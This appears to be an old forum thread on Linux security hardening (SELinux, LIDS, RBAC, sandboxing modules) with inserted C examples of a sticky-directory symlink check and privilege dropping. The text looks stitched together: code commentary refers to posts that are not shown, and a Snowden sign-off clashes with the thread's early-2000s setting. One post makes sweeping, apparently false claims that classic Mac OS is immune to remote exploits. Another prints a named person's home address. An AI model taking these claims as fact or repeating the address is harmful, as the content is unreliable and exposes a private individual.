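/* The rule from item 4 as a pure decision: inside a sticky, world-writable
 * directory (/tmp, /var/tmp) a symlink may be followed only when its owner is
 * the process doing the following or the directory's owner. Elsewhere the
 * ordinary Unix rules apply. Returns 1 = follow, 0 = refuse. */
int symlink_follow_allowed(mode_t dir_mode, uid_t dir_uid,
                           uid_t link_uid, uid_t follower_uid)
{
    int restricted = (dir_mode & S_ISVTX) && (dir_mode & S_IWOTH);
    if (!restricted)
        return 1;
    return link_uid == follower_uid || link_uid == dir_uid;
}

/* Apply the rule to a real path on behalf of the calling process.
 * Returns 1 follow, 0 refuse, -1 on error. Non-symlinks are never refused. */
int check_path(const char *path)
{
    struct stat lst, dst;
    if (lstat(path, &lst) != 0)
        return -1;
    if (!S_ISLNK(lst.st_mode))
        return 1;
    char *copy = strdup(path);           /* dirname() may modify its argument */
    if (copy == NULL)
        return -1;
    int rc = stat(dirname(copy), &dst);
    free(copy);
    if (rc != 0)
        return -1;
    return symlink_follow_allowed(dst.st_mode, dst.st_uid, lst.st_uid, geteuid());
}

/* What an application can do on its own: create its temp file so that a
 * pre-planted name cannot redirect the write. O_EXCL fails if anything already
 * exists under that name (a dangling symlink included) and O_NOFOLLOW refuses
 * to open through a symlink. Returns the fd or -1. */
int create_private_tmpfile(const char *path)
{
    return open(path, O_WRONLY | O_CREAT | O_EXCL | O_NOFOLLOW, 0600);
}

/* Round trip in a constructed sticky world-writable directory (an assumption
 * of this example): our own link is allowed by the rule, a planted link-shaped
 * name is refused by create_private_tmpfile(), a fresh name is accepted.
 * Returns 1 on success. */
int selfcheck(void)
{
    char dir[64] = "/tmp/stickyXXXXXX";
    if (mkdtemp(dir) == NULL) {
        strcpy(dir, "stickyXXXXXX");     /* fall back to the current directory */
        if (mkdtemp(dir) == NULL)
            return 0;
    }
    char link[PATH_MAX], fresh[PATH_MAX];
    snprintf(link, sizeof link, "%s/planted", dir);
    snprintf(fresh, sizeof fresh, "%s/fresh", dir);
    int ok = 0;
    /* the link points at a name that does not exist: a classic dangling plant */
    if (chmod(dir, 01777) == 0 && symlink("nonexistent-target", link) == 0) {
        int own_link = check_path(link);              /* our uid owns it: 1 */
        int via_link = create_private_tmpfile(link);  /* -1, errno EEXIST */
        int err = errno;
        int via_fresh = create_private_tmpfile(fresh); /* a real fd */
        ok = own_link == 1 && via_link == -1 && err == EEXIST && via_fresh >= 0;
        if (via_fresh >= 0)
            close(via_fresh);
    }
    unlink(fresh);
    unlink(link);
    rmdir(dir);
    return ok;
}

int main(int argc, char **argv)
{
    for (int i = 1; i < argc; i++) {
        int rc = check_path(argv[i]);
        printf("%s: %s\n", argv[i],
               rc == 1 ? "would follow" : rc == 0 ? "would refuse" : "error");
    }
    return 0;
}
```

The pure function is the part worth keeping separate: the "refuse" branch (someone else's link in /tmp) cannot be exercised without a second uid, but it can be checked in isolation with any uids you like.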
Some kind fellow was running an SELinux box with a guest root account.
The account was powerless. SELinux is a paranoid sys admin's dream. You have to specifically grant ifconfig permission to see properties on each interface. Ping needs raw sockets access granted for each interface it wants to send pings over. etc.
It is stupid, but it means that even if someone does have an exploitable buffer overflow, their easily available rootkits are unlikely to do anything useful.
There was an example a couple of years ago where a Mac running Linux was left up in a default install with a "crack me" contest. (The prize being the Mac. After a couple of days they also handed out the root password.) After much effort and publicity (it got a lot because the contest mocked a parallel Microsoft stunt to test Windows 2000), the machine was eventually broken into, by someone using a well-known buffer overflow that had been public when it was first set up. Even though there were standard rootkits to exploit it, they were all x86 based, and wouldn't work until someone rewrote the necessary assembly code for the Mac.
In other words, using non-x86 hardware raises the bar. A lot.
Here is an Idea for easier security management through ACL's.
Add a file system capability mask. This would be similar to the Group and Other file permissions, but would block those permissions.
For instance dropping the "rw" capability from the "other" and "group" masks would cause this process, and all its children, to be denied access to files that it doesn't own (services should not be run as root of course), but still access files owned by its user or files/directories explicitly given access via ACLs. This way a user could grant access to everyone for his/her directory, but a system process couldn't be coerced into reading that directory, or any directory. An admin would have to explicitly grant access for a system service. The whole /bin and /usr file systems would automatically be traversable, but directory listings, file reads, and file writes would be impossible for such a process.
Is there any project doing this? Is this even a good idea?
LIDS is a great second defense. It comes into play when some cracker manages to get on your machine. If you set up the rules correctly, they won't be able to install their rootkits or will be easier to spot.
The only problem with LIDS is setting it up, since every Linux distribution writes files to different areas. If you declare a directory as read-only or append-only and a program wants to delete a file, you might have problems.
If you have a webserver or a machine in production that is connected to the internet, LIDS can be a good investment (time that is, it's free).
>What sort of problem were you having?
As I walked through the instructions, at some step or other it became apparent that the LIDS build process was wanting to modify the machine it was currently running on, or at least it sure looked that way. Since the build machine wasn't the target machine, I immediately stopped, and haven't ever had time to fiddle with it, again.
I'll also have to check out the sample SELinux security policies another responder mentioned. That is, once I get that increasingly rare commodity called "time" again. The dishwasher went on the fritz tonight and leaked, so after a little work tonight, tomorrow night will be repair, then some bin and paint in the basement ceiling after that. Then back to the scheduled home projects backing up.
The living have better things to do than to continue hating the dead.
RBAC is the most adequate solution to manage security of a collaborative environment. Read more here:
"The principal motivation behind RBAC is the desire to specify and enforce enterprise-specific security policies in a way that maps naturally to an organization's structure." Briefly, it's like an RDF graph: you have subjects and privileges mapped to each other (M:M) using roles, which, in other relationships, hierarchically describe users.
They have some examples for Linux. I've tried its concepts in a few applications and found it really very naturally and intuitively reflects security requirements in commercial systems. Oracle and NT security models have something similar, although NT domains are not nested while in Oracle the role graph is not really hierarchical (acyclic though).
I've read about NSA SELinux and found they show very good progress, but it's just a beginning. I believe that RBAC eventually will come to Linux (and to BSD after that?). Nothing is impossible in Linux (and in BSD, lol).
Less is more !
NOO! Microsoft definitely does not know what their code does.
By taking the time to respond to it, what does that make you?
Helpful.
OpenBSD not only has more security, but you can leave it out for longer without having to remotely upgrade. Ever remotely patched/installed a kernel? It's quite, quite annoying. Why is it you can do this? Less holes AND more highly integrated code... plus, once you add in that the memory allocation routines in OpenBSD are quite extraordinary (try running X at a high resolution in linux, then run the exact same thing in openbsd... you'll see the difference in magnitudes ^_^), so it's harder to overload your memory. Just a thought.
The dream reveals the reality which conception lags behind. That is the horror of life- the terror of art. -Franz Kafka
Try this. Go to http://www.hp.com/security/products/linux/eval/ and get it. Or wait for version 2.0 prob. this fall. Set up "compartments". Run applications in compartments, by default nothing is allowed except local console on reserved sys compartment. Communication between compartments is only allowed by explicit rule sets (IP, port, file access, etc). Network interfaces are compartmentalized. Compartments are chrooted, no raw sockets, no telnet, lots of other goodies. Includes default setup for Apache, Tomcat and other stuff.
Yes, but my linux box, can handle much more traffic than your Mac box. sorry buddy, in the real world, macs just don't cut it.
--p06
-- p06 "On religious wars: They're essentially wars over whoo's imaginary friend is better"
I hate these "Ask Slashdot:.." stories. This is not a technical support forum, and 'Ask Slashdot' is always about something technical. Get something more general where the mainstream can think deeply about....
I found the SNARE package (kern module, user space audit daemon and config GUI helpful)
http://intersectalliance.com/projects/Snare/
At least an authorizations/privilege security model instead of the anyone/root distinction is absolutely necessary.
The problem is that many daemons (like Sendmail and such) override *all* security - of course, this is absolutely unnecessary.
For example, on Argus enhanced systems you run Sendmail with the pv_asn_port privilege instead of root privileges.
If someone manages to hack Sendmail, then the attacker can do nothing else than just open port 25, while on other OSs (even OpenBSD) the attacker gains root privileges.
Sendmail does not need root privileges to run, so why should we give Sendmail root privileges?
One key to more security is the 'principle of least privilege'. Modern Unix Operating Systems like Trusted Solaris show that it is possible to implement fine-grained privilege control in Unix kernels.
Just securing a few dozens of applications (that's what the OpenBSD project calls OS security?) is not enough.
What if I need to run some other application?
An Operating System should be able to protect data even in the case that an application gets hacked.
Our real problem is 'root' - it should never be used for any kind of server application (daemon), but only for system administration by an authorized user. There should not be any permanent processes running as root.
LIDS, the grsec patch, NSA's sample implementation of MAC and such things are steps into the right direction.
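The "acquire the privileged resource, then give root away for good" pattern behind both the Owl syslogd/klogd description earlier in the thread and the Sendmail/port 25 case in this post, as an added C example. It is not Owl's, Argus's or Sendmail's code; the ports (514 and 25 are the two from the posts), the unprivileged account name "daemon" and the loopback address are assumptions.

```c
#define _GNU_SOURCE
#include <arpa/inet.h>
#include <errno.h>
#include <grp.h>
#include <netinet/in.h>
#include <pwd.h>
#include <stdio.h>
#include <stdlib.h>
#include <sys/socket.h>
#include <unistd.h>

/* Step 1, done while still root: grab the privileged resource. Binds a TCP
 * listener on 127.0.0.1:port (0 = any free port). Returns the fd or -1. */
int bind_listener(unsigned short port)
{
    int fd = socket(AF_INET, SOCK_STREAM, 0);
    if (fd < 0)
        return -1;
    int one = 1;
    setsockopt(fd, SOL_SOCKET, SO_REUSEADDR, &one, sizeof one);
    struct sockaddr_in sa = {0};
    sa.sin_family = AF_INET;
    sa.sin_port = htons(port);
    sa.sin_addr.s_addr = htonl(INADDR_LOOPBACK);
    if (bind(fd, (struct sockaddr *)&sa, sizeof sa) != 0 || listen(fd, 16) != 0) {
        close(fd);
        return -1;
    }
    return fd;
}

/* Step 2: give root away for good. The order is the whole point:
 *   supplementary groups first (only root may clear them),
 *   then the gid (after setuid() we would no longer be allowed to change it),
 *   then the uid last.
 * Finally prove the drop is permanent: a later setuid(0) must fail.
 * Returns 0 on success, -1 on any failure. */
int drop_privileges(uid_t uid, gid_t gid)
{
    if (geteuid() == 0 && setgroups(0, NULL) != 0)
        return -1;
    if (setgid(gid) != 0)
        return -1;
    if (setuid(uid) != 0)
        return -1;
    if (uid != 0 && setuid(0) == 0)
        return -1;                        /* root came back: refuse to continue */
    return 0;
}

/* 1 when this process can no longer become root, which is the state a daemon
 * should be in once it has its port and its log files open. */
int root_unreachable(void)
{
    if (geteuid() == 0)
        return 0;
    return setuid(0) != 0 && errno == EPERM;
}

int main(void)
{
    /* 514 is syslog's port from the Owl post; the same code with 25 is the
     * Sendmail case. "daemon" is an assumed unprivileged account, playing
     * the role of Owl's 'syslogd' user. */
    int fd = bind_listener(514);
    if (fd < 0) {
        perror("bind 514 (a privileged port: needs root)");
        return 1;
    }
    struct passwd *pw = getpwnam("daemon");
    if (pw == NULL || drop_privileges(pw->pw_uid, pw->pw_gid) != 0) {
        perror("drop_privileges");
        return 1;
    }
    printf("listening on 514 as uid %u, root unreachable: %d\n",
           (unsigned)getuid(), root_unreachable());
    /* ... the accept() loop would run here, with root gone for good ... */
    close(fd);
    return 0;
}
```

Once drop_privileges() has returned 0, an exploitable bug in the accept loop gets the attacker the "daemon" account and an already-bound socket, which is the "can do nothing else than open port 25" outcome the post describes for Argus.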
A totally paranoid OS is rejected by paranoid people. It's also funny how people say how nuts you are to run NSA linux while recommending installing LIDS (built by China).
:)
People can be so entertaining at times
-- "of course thats just my opinion, I could be wrong." --Dennis Miller
Not EXTERNALLY. All the points about why no mac in HISTORY has been remotely exploited are because of those original points.... no way to get executable code into the machine.... at least historically.
If you want speed, and do not care about security, run Apache on a mac, because Apple demonstrated 20 months ago that the mac ran apache in a benchmark far faster than any other computer similar in cost.
The Mac OS running Open Transport, based on open protocols, and bilevel protocol stack declaration order is amazing. It avoids lots of famous TCPIP hacks and it also allows end-to-end file transfer from ram to ram without copying a single data byte! (only pointers to buffers are passed end-to-end in the most ideal situations) There are also papers that discuss proper tuning of open-transactions vs queued transactions and how to get the most astounding hits per second from dynamic webstar content.
It does not raise the bar.. all intel stack exploits for LINUX can be trivially rewritten into PowerPC, and tutorials have been written.
1> There is no command line shell to allow redirection. No shell, no shell exploits or redirection of scripting.
2> Everything is 'root' at all times so programmers do not get lazy and fantasize about the existence of a more secure root to help protect them. The Webstar server, and other servers, as most mac programs, is written knowing that security is important and that the code is running at root. Truthfully, PowerPC apps run at user-level, and Gary Davidian's birthdate needs to be passed in a register to gain true supervisor level, but no normal benefit is gained on a mac from running in the microkernel space or debugger-nub space.
3> Macintoshes do not suffer from stack exploits based on buffer overruns of C style strings. The mac uses Pascal style strings, instead of slow null-terminated strings in most all aspects of the entire operating system and in most users' code. ANSI-C libraries are traditionally shunned. Pascal style strings are not only faster, they prevent the vast majority of buffer overrun problems.
4> Macintoshes do not EVER execute code from files that are simple data files, no matter how the file is named or no matter how the file suffix is generated or set. Macintoshes use dual fork files, and text files and data files traditionally cannot easily become executables, and furthermore would typically need to have their 4-byte FILE-TYPE set to a value to even begin to allow a hacker's file to be blessed for execution. Webstar and other tools do not typically allow any hacker or rogue tool to set file types by accident or on purpose. On a wintel system a text file saved with a .exe extension can be executed!
5> Source to mac os (pre os X) is not typically available outside apple corp. This is not a valid argument for security (obscurity), but the apologists for the copious amount of linux redhat exploits use this as one reason for the many bugtraq exploits covered.
6> The Mac OS webservers running Webstar do not automatically allow errantly saved files from executing out of the CGI bin merely because they are stored there.
7> The Mac OS has other good multi-homing multi-domain tools that run on it for robust free email (SIMS), DNS (QuickDNS Pro), FTP (Rumpus) and all have nice user interfaces to configure them and though these commercial tools may not be technically as secure as Webstar itself is, or the MacOS, I prefer them over running any open source tools on FreeBSD, NetBSD, OpenBSD, Linux, etc. Free is only free if you value your tech support at 0 dollars an hour sometimes. Plus, these other non Webstar related tools seem to have mostly unblemished histories, unlike BIND.
8> People on the mac tend to use scripting languages based on Applescript rather than perl for os level dynamic work and protecting against some minor perl problems, or unix scripting (no command line on a mac, thankfully). I cannot attest to java as being swell, but the fact is many mac people tend to do dynamic content in straight C. Happily Webstar includes a rich variety of trusted dynamic content assist tools.
9> Stack return address positioned in safer location than intel. Buffer exploits take advantage of loser programmers' lack of string length checking and clobber the return address to run their exploit code instead. The Mac places the return address in front of where the buffer would overrun. Much safer.
In fact in the entire securityfocus (bugtraq) database history there has never been a Mac exploited over the internet remotely.
A rare set of documentation tutorials and exercises on rewriting all buffer LINUX exploits from INTEL to PowerPC was published less than a year ago. The priceless hacker tutorials were by a linux fanatic : Christopher A Shepherd, 3036 Foxhill Circle #102, Apopka, FL 32703 and he wrote the tutorials in a context against BSD-Mach Mac OSX.
He was motivated by Phrack issue 49 (an intel article).
Believe it or not, I do lock the computer room door.
But the Ruskies still hack into my systems !
Looks like they do know some (undocumented?!) BACKDOORS of Linux systems.
Where to find the info on those (undocumented ?!) backdoors in Linux ?
I am interested to know !
Muchas Gracias, Señor Edward Snowden !
Citing from their page: Key features:
Will NSA's Security Enhanced Linux stop the Ruskies from hacking into my systems?
I'm tired of searching high and low for security tips, applying patches and such, and still having the Ruskies prying open my systems with no problem.
Methinks there's a list of "undocumented Linux vulnerabilities" out there, and the Ruskies (amongst the others) are using it to hack Linux systems.
If there's such a list, I'd like to take a look at them. I'd like to close all those holes.
Does anyone have the list?
May I borrow it, please ?
Muchas Gracias, Señor Edward Snowden !
So unless you have a completely homogeneous network there is currently no way to my knowledge that you can use ACLs across machines via NFS.
As already mentioned, ACLs give users working in groups more flexibility to share file access, rather than having the admin create a new group for each new permutation. They don't really enhance security.
Idempotent operation: Like MS software, whether you run it once or often, that doesn't make it any better.
Oy vay, mod down oredi ?
Oy vay, mod down oredi ?!
This is not specific to FreeBSD. Every BSD variant has had this feature for ages AFAIK.
Medusa http://medusa.fornax.sk/English/project.shtml
is a set of patches that help you secure your Tux kernel. I do not have an in-depth knowledge of the workings, but there was an article in Linux Journal http://www.linuxjournal.com/article.php?sid=3811
I think this might help
Incorrect -- There are fewer exploits for MAC OS[anything] because frankly the security community couldn't care much less about how many ways you can exploit all of the three MACs connected to the internet :-)
For testing we have a Red Hat 6.0 based demo server running various services with known and unknown security holes: sshd 1.5, qpopper, wu-ftpd 2.6, Apache, BIND 8, and so on. These are original unpatched services, no firewalls, the only extra thing there is SecMod. The module has been configured to "sandbox" these services, and has done well enough to protect it for over two years from daily compromise attempts. We also offer free user accounts on the server for anyone who wishes to try local exploits too.
Creating the rule chains to configure the module is quite simple. The most common way is of course to define rules saying "this daemon program can't read any file except this and that, it can't execute anything but that, and can't do any syscalls except those, and can only write to this file. If it tries anything else, deny it and add an entry to syslog.". This has proven an effective protection against security vulnerabilities.
You can do many other things with these rules, for instance define ones saying "no-one is allowed to read these files (even root), except the file owner and users in group X", or "no-one can read this file with other program than 'pico'"... It's also possible to easily define chroot operations to be done in wanted circumstances, in other words "when user Z runs this program, create a chroot jail here".
For anyone interested there's more information available on www.secmod.com. The demo site address is demo1.secmod.com. --Jouko Pynnonen, Online Solutions Ltd, Finland
For those actually following this as a guideline (if anybody): I forgot to mention: make a /etc/vservers/01.conf and you need IP aliasing support in the kernel (and of course a kernel with the vservers/ctx patch).
--- Hindsight is 20/20, but walking backwards is not the answer.